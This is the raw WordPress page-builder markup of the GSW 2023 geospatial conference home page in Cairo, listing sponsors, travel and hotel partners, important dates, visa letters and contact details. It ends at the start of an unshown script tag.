width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://geomatex.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/32596kmnqz.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><a href=\"https://gsw2023.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function 